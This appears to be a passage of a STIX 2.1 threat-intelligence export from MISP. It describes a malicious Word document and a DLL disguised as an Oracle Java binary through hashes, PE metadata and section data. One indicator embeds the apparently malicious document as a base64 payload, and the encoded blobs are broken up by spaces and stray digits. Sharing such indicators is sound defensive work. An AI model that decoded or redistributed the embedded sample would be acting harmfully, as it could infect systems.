q j F l 2 t 7 f 8 a o i H 2 y o + l O T c 3 S 5 K f W L E 64 W 5 c V 6 Q n q 8 Y K + V O c N c Y V R W Y k 0 P P M v e R G I 6 N S X G u O V N 8 Z T X 9 c 15 q P k Q H j x 6 i N 76 n R i C n o K l f q J F x T 9 v n P j x n C v k 3 n C K Z o 9 r 9 r s 2 a e U M 7 n X X h R D v V v U I 0 o W h r 4 a z M s q j W k t 9 v v x k g i E W 84 H W s + D W 0 S F I y 7 n I Y r 1 r f H 4 X L U 0 w W i C N A Y c W t I p 8 g + f N C A l h 2 + r s E / j Y C m M y W H 8 x U 29 c p O Y 0 o l Q 7 g G g + X D f G B p E p s u X Y 3 f R o Z e j Q R I P Z B K A k d / 7 q j O E i 2 c 2 V o / n a R m A K h M b V h 6 + h 6 l 4 F r m R M f M c 1 F q c j 91 E G c / b K X Q v K a I 4 u L y t Z d Q 2 p o Z A c o R 3 B N / u T x A q k A x K 9 U D m N F D 86 u + w H w 88 S + g B + X y f R K j u g M 0 M f / H v I y q f D 1 s G A S u x r Y V h Y + V N W q B W P N W E Z g A D Y J F Q u O U 8 q h t z i 2 / 9 q R Z K 3 r h s d X O t F K A 9 K C T 2 r Y W y b B 6 L E v p h s R D h g S A x Q s b 8 G w b O o R R / e l r C 9 K B L c 5 X i Q K r x z C T i A N q k v d U E j p + p U j e m D 5 e q C s T z p 0 O W z L f H h 9 / g V 0 f f I 8 / U P A R L O y B T o W 9 a n F w g J D 2 i m D d / o + l 36 k G c 4 / X g 3 O 4 c 65 L X b 9 S 8 m v h s 4 p P J s o K 5 t t c + x + P 9 e J 47 F N D M e n R J f n H K u c v s + m W 8 + G r L 7 F m E L t 6 Q s O R U 7 S w i z D J v K 3 i Q t b D o d h P z J E s 0 w 0 Y y R c Q + o P z A X N + g N O S G G Y n q + Z P O d u 7 c 94 n J 6 O w A a j q 16 X k O k S w P e 0 B 5 Z x V h H B Y g v W n Y K R J E c o X C w J V C H a S i E K L c l M b T f s F 9 e y r J D H Q X 1 V l u s 21 M 4 / J e M V 29 I u L D g L o B O k x e X J p 3 t j h u b e Z P S d x C / E 8 D H d F m U G c M n o 0 f p Y n C Q N k 4 G O W Q z N j S J 8 Q C E 9 V N p s h W S A r I w J 7 F n p i 4 k D 5 d 709 y U W k I o t v 4 X / 6 m E F 18 L 6 I H e k f C V P y K e a n b 0 L J 2 H B 6 Y c 0 s l o 7 k 2 g e o j b F J k T E k a J T 6 U Z F A k F 7 A m c o W K N J d V B s d m S M v l C W w x 3 Z O / g 3 R 9 c E r o N L b x C i z N e R A + W W T m 6 l b 0 Y O B T h D Y m 5 o g m b j U o 5 U S O s D g y 2 I 0 P k q h b T V d T / U S n v N M e j / 6 O T N K H + T s m i z 8 n f P u P p u 600 H 83 z h y b q c 9 R L W i n u a d b K u k J P 4 P d 1 e x k I 54 e f 7 X E i F J l k a F s d g Y c 0 N u m S O I C 1 m h q B D D x b H g N H 44 h A 8 + s 4 D 0 u h s x + + H + 2 q W p b 6 Y C U 4 P o K Y s U M H j C f c s n e c P B 7 E O S 1 L O Q i M h Q s T 6 I g J Q d z G K c O n Q j A d K K X i i H / 0 K E c U Y d S 4 g I T k G T 97 Z I I g f F 3 G w l e j L m n 1 L 5 f 8 h A N C V F x E D T + 8 B J 8 S 8 r G I p m O G 4 T 9 q 7 y A K c F / Z e N 3 H B J f e B G 7 O T N E z H I C P j x b S A C I x Y m 9 d 7 g f S a N N q R H m 15 E K y U p T A 10 c + o p u J K I r H l x L 17 s 8 O u 3 B e 8 z b p l V o 5 K 9 P C U n o U 9 x t A A E z Q C A M / y f y x + 88 R g i o k 2 R L q l J b s F I R L t Y i 5 O z H 2 + q U J f / b o L J d q s e v G y d G o Q z 7 p E A k D v o B 6 d A O I p U l R R C D a l N C X 7 U 97 M u C / p u 82 q U 47 X c N z n s + x 4 z i 9 V z + 5 Y T N T J 7 o / 9 T 3 v 1 v C t + a 5 K m j W e W I l q 8 t d J 0 D i 2 M h P L N p s L t l 2 Z l J K I C 8 a k u x 0 i V X J g s Q 2 v t l a d 30 R h t 0 p 0 R C v D h / F v q K 4 M k v F m O S H x 4 J d T w a 3 c P c I D 8 j g t h P D b i Z x M 5 E v b A a i j I P o g y b / X V p + L V 38 n y 6 C f y t h H 4 n 7 a r n 29 f a M Z E T H z W A Z h c O T a x c H x g Z p H X G 2 s O 7 h i h w I P O T G o 2 w X 4 o u 6 w Y b k v Q l r / V n 0 V h c y V W v t M H L b K / N / w V U J v V v Y z p f / f b T h c V Y w V A K T l G w K 2 z + b e 84 C U h g h l w 0 W 24 y T w + v 1 i N G e d 1 n n O t G Z D q A u 8 c m S l k x V 33 / B Z 7 + T X t k I O Y j O 6 O S M L g i 9 t R v w W f i Y I i d a v g A 336 B S G R d 8 y X y S w w U H a s u l 9 O g y L T / Y c g G b 8 K 8 v M L T I w 9 + 1 A y z l P V p m Y R Y W i d / W U T 8 F + N 10 l h + I g b e k C x s 3 i g t e R w 1 a v S G f + c 6 d u Y C I W W q m k l Q Y u y Q 6 e T r / q w M h + N o 7 n h U p Q L z l S L 5 u O 2 L Y c 5 p T + 1 N c J z H R f 4 h K 0 6 v Y f Y J W 9 A c t 1 H J O t C Z K Y J o K w C 55 Z 9 o w 0 t 7 g J w + 7 y k e I m u C Y f R r K b u v B E H W o + a 8 Z P M 4 s 5 X B v G 4 p 4 W Y f b s R 11 b t x c i x 9 B 2 M w W T q K Y 2 d t 12 P N O u P + 4 s s k J 6 j K o P f h F 7 i e + E N J 8 M p 5 O X g D Y V 3 K c 8 l x O 6 P a Z c i Z n 8 V l O P M r R z h G Y r E V 6 A n 2 F e l E 6 a d g J Y J Z f k S X 74 N C b b A L h + Q / r G 9 v J y k e W q D T M q + 4 J i f u o t / I O R 1 Q J y x P z + N 9 d i p 5 S v J 3 k y A l Y 37 w R b g / o c T G X Y c c c L g y d O S 1 i i c O Q / s 4 F F / l Z K 8 V q x c H w A a m Z A a d h T f O p C 6 U I z x T s e V u o 7 M z 6 F 98 S J A 11 a 7 j E l H I B k 0 W H j a 8 w l D 95 J s X B 9 / h 5 h u L 4 V V U 7 x z m r X 49 z t k C K / o //8swixj+o3NfFiEt7baoQD0BMfB05oY1hqcIgbteME21JE9m7xkKvAKV4HIuX7YtaQDtspDcrnnhL1YlE6YFqF2re9pAfJqMF5gWx++Ys3/P5STZ7xik86hk/+xUlBH0B6MnD3gDuhje8EGjcY8kw+rebv0drZikce0FPv+1XspiuMJszSaIZ+oNs3XpsNlo7v5xEUr4i00tshtKahPdiFxh2RuMghyRV9pn/H1vY+TgjU5NYHnoJkqb7oODgCPV1qQ+2ozjiIn4C2pk7tM8TukkPIsHq9OPe70+d/FryBE/rUdF80mRVu1YghI7ck1wcoA5OFu1EE2VTiRchPW3BtjuPu
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-02T18:50:54Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--9bb216ae-af15-4cba-9d65-40be296d9438" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T00:46:32.000Z" ,
"modified" : "2020-08-03T00:46:32.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' 0 a 4 f d 937473 f d 2731569 d 1 a 39411477 e ' A N D f i l e : h a s h e s . S H A 1 = ' c f b 9390326 c 41 a c 0e81 b 0 274386 b a e 21 c 53307 b 1 ' A N D f i l e : h a s h e s . S H A 256 = ' e 3589 a a 5 d 687e58 e e 97 b d a 2 c 501 b c b a 9 d 5e942 f e 929644602 d d 1645 b 3 c 7 f 0e94 ' A N D f i l e : n a m e = ' J u l y 2020 _ 2485413825 . d o c ' A N D f i l e : s i z e = ' 623616 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A N A F A 1 F O v 6 U e F O o G A A C E C Q A g A B w A M G E 0 Z m Q 5 M z c 0 N z N m Z D I 3 M z E 1 N j l k M W E z O T Q x M T Q 3 N 2 V V V A k A A 2 h e J 19 o X i d f d X g L A A E E I Q A A A A Q h A A A A 4 L K q h O o f X 5 u N x x l 8 p 6 W W 7 U n 2 V N h 0 a t M U 1 j 0 I L m n I o G + w R v 78 p 8 L h E Z 7 J T V j K s E v Z F a N K t Q 6 Z x Q Y v M R h s W N 4 O G w j c p M d + 7 o + T V f d U 9 C A V 88 Q 1 K d c E P K H W 3 z t V m X p A z V H D h q F 2 G G L A 94 L n h R W C v b u O 2 l v H M K 2 Z T t v N e B 3 L N 7 p r C 9 / F V b s 45 p Q V j m J i l y 8 E T 1 + 439 B s F 14 b O M x A r c c z v O r N / E v 8 M S a b M S G s 4 B G H G r a Q g 9 J m C O A g b B 5 M f S j W M / m d R k I L D 2 n S b 8 Q t 42 Z + N 42 H n v g / V c 7 f t A c 2 Q k 51 M 23 M G S Z M A q 2 v j O g + B i + 4 q X Q t W S a p 44 S l t S y w z Q r c H y D z p 6 r b 0 a s 1 M R O L F g q 6 h A S 1 s d C o P o 9 L 2 g 1 M 55 K Z w S t x o k C r P 0 9 m 4E8 q b x 7 w e N P v G b 1 j f 7 G g e S Q v m K c B e T 8 L X X x a h s u U x 4 C b Z 67 J H X j z p v 4 R a Y j z w 57 f A v i F z X 1 P B 4 i m d F R W t M J / Q 4 z f C p n o M / T A T j L K m 5 H B V J F r u l k 4 l F 26 K 4 L M F S Q s E z P R Z j j S Z 1 x N q 6 W G r T A r g D p w a l 37 m p W t k 52 l O / Z l o D 5 u v k W 3 u m P 4 / B 8 j E F c / a 37 e y N P L g a M C H J G N A R P c X t v o Y y d C G L 9 g Z L v C 1 s 2 d q Y 5 W 2 d k 7 d 1 L S l A o 7 W 4 u y L C C X A / c V g r i P E e q O 3 n p d l s v p p 7 + L m w W 4 C 78 F 5 o q W 5 c I t V Z f N S C 98 j j Z O d P e 5 a T u 4 L W n F S m D o 9 c w u F C C i 29 I h 61 b 0 u w P Y i h E X / x 9 P t U b w M X v + i H 2 t f O X r D M P U 7 O 4 x J b + S 6 y n L 2 k 5 o 1 y 3 S 9 D F P / z v n V V V H + F h c / M w 9 E T h N E / o n 2 y r a A 84 v D W w z w 6 a O B E J x d X f 3 B i 2 c i K c H O p F / C J 26 h W B 3 + j 3 A j E 2 + f L c W 8 b x V V N + f h J w X i 9 b y q h T N 4 s l q I c L X t L O d Z e F F e P N o K Y x Y P K E Y L r I Q 4 x h y q c A 7 X M h 6 M g B d b A / L 8 s 5 R t D v v t e M + X u I v g N n O f S j N h p 7 v M F E j p D n l w 57 l W A v Q W P C D 4 C U q A z 1 c Y V A 0 b v p F m S f q Q U 1 / p p b h V W m 0 B z B g A M I P Z k y L 5 W Z o z t k E j Q N t c + H L p g W j 77 z c J 4 H z F m g q z m + D + V W J 4 V u l H y F l u N l B z S k D P C t M V 9 N B K T b k L 6 H F j r j l Z 0 0 T Y K Y U j J c R Z O 6 q F d h a M 9 Y M F 2 y z t 3 n I b r q g a / w h 8 l w a C g f U s M J n w o 1 B + x P 7 U Z v 8 m h L r 10 i T I K Y Y o 5 e u t J u + l v L D B K f U L / z e I n o P 6 + I + 5 X 15 J 9 x A w K W v p 3 r E Z c 1 n p f 140 T p l 36 d 3 T f 6 l L t F 9 V v V l R z v i t b c e L Y q z W M I 5 x 2 G w S F m P m 3 z d 9e7 k A Z J M O K I Q z O u O a J j k f V E K D r a H 4 z i V 0 i f a Y 4 A P X 5 R S P c G O a B d E b J 7 Y 8 J a p V C o 7 v u T p s d L w D C 0 b J s + Q + e x T u l R 4 U a d f g F a K n h d E t S L V 5 J q h z r 5 s V 2 g 7 W 2 r r 0 35 T U + J X A I z c n b n c x p X H 7 c t i k M n I F / n s T M b r T W A 8 / y c 25 A 6 t 2 / Q 5 U E A M 8 T 8 k k C / c Y K 2 N / s r 0 A y 9 N D d q 5 w k z j 2 j H Y P m F R 5 c E S J j k a v E J L 92 m h U / j J u H y V 5 A T c Y k Q k Q 1 Y c U + f 436 + 0 4 x x q a G 19 V D f W Q m E f r Y 1 s c p 8 g z j n b t r h 1 U L e 38 j q T s l + j x 0 + J V i 3 s 2 k F z F U d C W G R 5 T F t l N G b 8 B a f H I c D x X w o 2 A F D e j t F m K U m Q a 16 j Y F 1 f a k F 3 W I w K b l E C d K J 2E2 d S g h a t + / z l o g 6 M 9 d m C 0 7 d s O a f / e w w Q N 8 y P o 3 u 6 I 4 n + y d 12 / Y 6 / y Q N 9 B 6 o r s / C U c Y O O 1 w 6 F n v e 0 h y C 6 V L U j 90 X H h 2 + H F Z 33 C s I r N u o 0 C A h 90 L e 9 u C d m A 7 E M 8 f F / h P + 2 L y 0 / C N r M + E u V 122 s V 49 F h h k T E W P 4 q 6 V j H n n K 0 W n W p 8 Z C r y M H g J T p P b D T 5 u t O M E u j 8 S m i l o 3 y 4 P g l A y c 0 o T f v l t N M j G K X i b v c 82 o v 5 L 5 r 4 F U g u H 0 V U h 5729 M G / A 2 d a 0 r U w o 58 e o + j 54 B + w Q j N a A R o 8 d E t V f B G g w t U 0 r O l D W + S c + h q B G f a z G y v e r u 7 K 3 / X t Z C w I I w v 1 M x N r 8 w R 1 S 2 X V v S O p L a q J + h T s B T y O 0 4 u S + o c G O r V 8 / 2 Q p B P I 3 i / e r S z C 3 f r r g U g K k n I Q n L K f q t M 3 C z 7 l I Y u 1 R z F N k 1 F C x 69 C M b z c L z Y 5 I J n 9 Y e p R 8 t M 6 F y s A Z 3 s r 2 A F I b T W o j l 7 K j 3 X K r f X J P + 0 e I S f d 0 H n y T R r e l U W e 4 L m C L h M z Z 1 z S X U Y j 7 W w 8 f A 3 v r 0 + b 0 Q b 5 f W m a I + J o 0 G N d I 4 O D H o p U N w 570 N 3 G t X w C 7 O t e 4 O d z Z 86 f 2 D L d n W e j l N v 3 M f n Y E u k 1 k z f K o 9 G U T q b 9 K g H n n e u k a R 51 M q Z Z m 2 j F 2 R N y n 4 t 6 g 4 H 1 L z 2 / i 97 D y 1 x C c + m L B X k G P f I m D + C + F / H B 20 m s Y i 1 L 10 G 471 q 3 e O a W d T V e N h I T A b f f w J p F U B t e c L u X F p N R 13 b 5 p e 1 h L g K Q s 1 G w c Y 4 n Z X x C u A 2 O O 5 H S t m 5 k 47 k B 8 o C f o Z E u i C Q C O d 1 a 8 D k D L t B I E I V z X w L w + A m t v 2 C k f J Y Y 8 z 5 r O D 0 S W i F F o O p M a 4 a M X K c H 3 m J v 0 c Z Y W J p 2 j x d U h v J E N B B O d I R c 6 S J 64 a T Y X X T W X Z n F c 7 M F X 4 J + O l G h I T b s I a C 8 R G f c P 7 u J w D 3 T a E S m S e B R e + l n 44 J k F D a L J H 5 B h C F o j Q 0 l 71 u h P Y L + x 3 a Q b Z 8 Z 4 M 2 Y / 8 J S B W / 6 y B H 5 j W H b C / r L o 33 C z H b V v p 79 D u s Q W g y 45 i a D s j h X E v z K o 2 A B P u K 0 b a d r G P V 75 v L f f 2 + T t i t S 9 b F 1 N a b L j t o e F h s u Q g I f V 0 P c B U G w N s q + b 3 l 6 Y t Z g t F Z O h R H B J v p R C b y j G 0 290 s l e Y 2 I w J Q 0 J L K M w + B + c 7 s N Z h R N W z V Q m 9 R t S u t s i A b 5 H B f 28 q N s z H q V v y F d H I 0 y Y k C N J 5 v R D s g 8 Z Q Q L 8 X z T Q k r U 3 u b 1 O b a v R P O H Z Z 8 B n m 7 + z 7 Y T f h q K M 2 i W N C x d b G K 8 S y A A h Z L a v x k 5 A x r A C q / T h e c y r N G J 4 c Z 9 J O M D f M f H l U a K I Z L n x h p V 4 j d O w 0 5 V u O 6 F h n m u n I s k h I o g P N 0 E / 3 i f m 3 L 5 O C E t W S b A 4 o x 7 f E d I 7 i Y H 0 R g 8 u u m s W o l l z h L 4 P z n l Z / n L D t 78e0 h s m o K S S M C b M C v X e T Y y O D C y Q 7 V O y W h w 6 O V 0 l K x r e t h n E u p N p M r 0 M P V 6 p u g A t g S J m Y c o 1 m g Y 0 1 L T 3 u 8 d S y t J M m s c h 78 U K e A z 95 F X W t P I 81 L z H h y L Y U N I g + M P / o k o 6 O 7 y V + X M P I L g x 3 g v Q 3 g t q z s i I r + U C 689 m i N s B Z S A O P v A 0 N t i i L 5 x 9 p n I l Y 1 j T t H g m n q H F X R 2 X 36 u Z O R e 3 M w v O R G 4 j O v R S M F R v T + Y L u h L p M j i u s y + k 3 N r z i X K R x v v V T R x 9 j D 9 e m 8 M b J z o z / T 8 l h b o 8 W 26 A c S W G z e A 8 T b s d l 0 j L 5 o R u X / m A n + o g N w 4 T K x x Z J I s d L 6 S N H 4 Q s / X O Z j f R H D Y A N i x M / f R Q d v E s D q t G z w o B i O x M p z / v e x 3 H G 6 p 6 y e y 7 G h s h w H O 5 Q b G S 18 u N s Y P m k L H 1 n 4 m t + 4 X K / g Y 0 H / s L A 0 k O 9 / I 1 Z 2 g m W q e Q 3 g 27 J f I k k f r x e n i k / g t / G n s B K 8 H o Q m V L y p l N N z n Y 5 f 6 T x 43 + C Y M y C u 2 G f e 9 n S l 21 s v p l 7 B b X G X o T l + r t b M 3 T 5 c P S Q 5 U G R Z c 75 S b d o 7 N V Y y L Q h F Z q 1 O g 6 F 4 w d c 50 M y G x e u u v M Y J v Z O 7 d Q S P d c h 13 J 0 e H C j E 6 O 4 f j L Q 6 e L y D p X o c C b Y 4 Z R F 2 l D G i V A p S j q E g k f q S O Y 7 C f F Z n G g f D n K L x y R / p 9 k
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T00:46:32Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--aec61910-1c29-47c5-88c9-37621ded62dd" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:09:07.000Z" ,
"modified" : "2020-07-15T20:09:07.000Z" ,
"pattern" : "[file:extensions.'windows-pebinary-ext'.number_of_sections = '5' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.optional_header.address_of_entry_point = '268451982' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2020-07-15T23:22:28+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = 'jp2native.dll' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = 'jp2native' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = 'Java(TM) Platform SE binary' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '11.172.2.11' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '040904e4' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = 'Java(TM) Platform SE 8 U172' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '8.0.1720.11' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'Oracle Corporation' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright \u00c2\u00a9 2018']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-15T20:09:07Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"pe\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--91bd79c2-d620-474e-9e81-52a3f7fe00d7" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:50:47.000Z" ,
"modified" : "2020-08-02T18:50:47.000Z" ,
"pattern" : "[file:extensions.'windows-pebinary-ext'.number_of_sections = '5' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.optional_header.address_of_entry_point = '268451313' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2020-07-13T17:36:13+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = 'jp2native.dll' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = 'jp2native' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = 'Java(TM) Platform SE binary' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '11.172.2.11' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '040904e4' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = 'Java(TM) Platform SE 8 U172' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '8.0.1720.11' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'Oracle Corporation' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright \u00c2\u00a9 2018']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-02T18:50:47Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"pe\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--2f0ff8d3-3e6b-4421-addd-6505f38211d2" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:50:54.000Z" ,
"modified" : "2020-08-02T18:50:54.000Z" ,
"pattern" : "[file:extensions.'windows-pebinary-ext'.number_of_sections = '5' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.optional_header.address_of_entry_point = '268451313' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2020-07-13T17:36:13+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = 'jp2native.dll' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = 'jp2native' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = 'Java(TM) Platform SE binary' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '11.172.2.11' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '040904e4' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = 'Java(TM) Platform SE 8 U172' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '8.0.1720.11' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'Oracle Corporation' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright \u00c2\u00a9 2018']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-02T18:50:54Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"pe\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--0537282b-b524-441b-bc04-7b894b342a40" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:00:03.000Z" ,
"modified" : "2020-07-15T20:00:03.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".rdar" ,
"category" : "Other" ,
"uuid" : "3f9c0725-773e-43c0-804f-d684b03092c9"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "16384" ,
"category" : "Other" ,
"uuid" : "0b837526-f8e1-4bcd-8ecb-329f516930ae"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "6.5945206832312" ,
"category" : "Other" ,
"uuid" : "fbbaae3e-27eb-4cd8-99da-a6f55838909d"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "5963427cd562179e2c2225fa6e8bb5d5" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "06c32bde-5608-47c4-a4fd-6ae4cc465b2e"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "5aea9aa2fbb76756ca7608fb2f0b50872cf9a919" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "2b7f6066-6112-4600-8489-d0acf3c87394"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "0384f96cf8498309325a168041880d52e9624f023a620316a7e4ffb94a20be92" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "e657a30a-27c8-466a-978b-459476309d8e"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "2d1f364720fa192a1cdd1ea3c9f5febce804f172929447f42dc66105fe9b5b65a06484dce3284bec79997ef4df3d6870aa86713d3305996bab4e7ccdd0fdbcac" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "bf8b548b-1636-44e5-a5ee-2301f3e296d8"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "192:bFGZboRzZ9QmDg//fOCVa/ott0dfwUVqFGN4W7OlKA8rof7/tpSEgxUajpiXjmIV:EB8ZvZbDdTTAf4owGI2Ee" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "6c94b9e8-233a-42f8-8734-9537e202d765"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--856d2b05-2aaf-42c4-bd6a-cbfdd5329cf6" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:01:15.000Z" ,
"modified" : "2020-07-15T20:01:15.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".rdata" ,
"category" : "Other" ,
"uuid" : "6cd4c038-ba0d-4603-ac3a-09673ea84425"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "118784" ,
"category" : "Other" ,
"uuid" : "b7f88d7f-93cc-4743-a1cd-170663465e33"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "7.9827191322039" ,
"category" : "Other" ,
"uuid" : "61f2e657-07fc-4915-8b08-289f836cacda"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "edd63a0a668eb9c4231cdd5e0c81a044" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "401e2bf6-1ca8-4f40-acd8-9cb535d8309d"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "a1238d408a37574e5525d9b9a820398f4d7ef82a" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "d7c0a094-afd8-4622-84d2-c18da9ff5c27"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "bfdb1a8c3324799ae08883d1298961f885a93ba5706f87a51f0434f847f4632a" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "a1cfaabe-9bd2-4246-9e10-48dd45e63dc9"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "b8d20414f732017b2274a74cab74d109ebcb9ba7fbb5280f6bb33046994f1565a4ef0b928158fbc3e86a8b49dc4f00a1c1b30c01dfc89184f7f30acec5fb222c" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "7ded34a2-3ce7-41d7-832d-83a91f4eddc6"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "3072:KcjL2k0JYG5gBxUh54Ms7l+w87ESgNtY8pESR:f6hB5gBZ74XQN99R" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "304a3fab-c5d1-4867-97ca-0efcbab42b49"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--f5deb688-77b3-4f0b-b997-0692d1966239" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:02:26.000Z" ,
"modified" : "2020-07-15T20:02:26.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".data" ,
"category" : "Other" ,
"uuid" : "8065b3ba-8707-4d21-b142-9ce4ca830386"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "69632" ,
"category" : "Other" ,
"uuid" : "b425d073-04ea-42b5-a609-c1e85546562d"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "7.9479643160405" ,
"category" : "Other" ,
"uuid" : "6e7e11d3-86de-4136-bdbe-33cedbdafa36"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "6d3bca57196c0913e08a876821f385e0" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
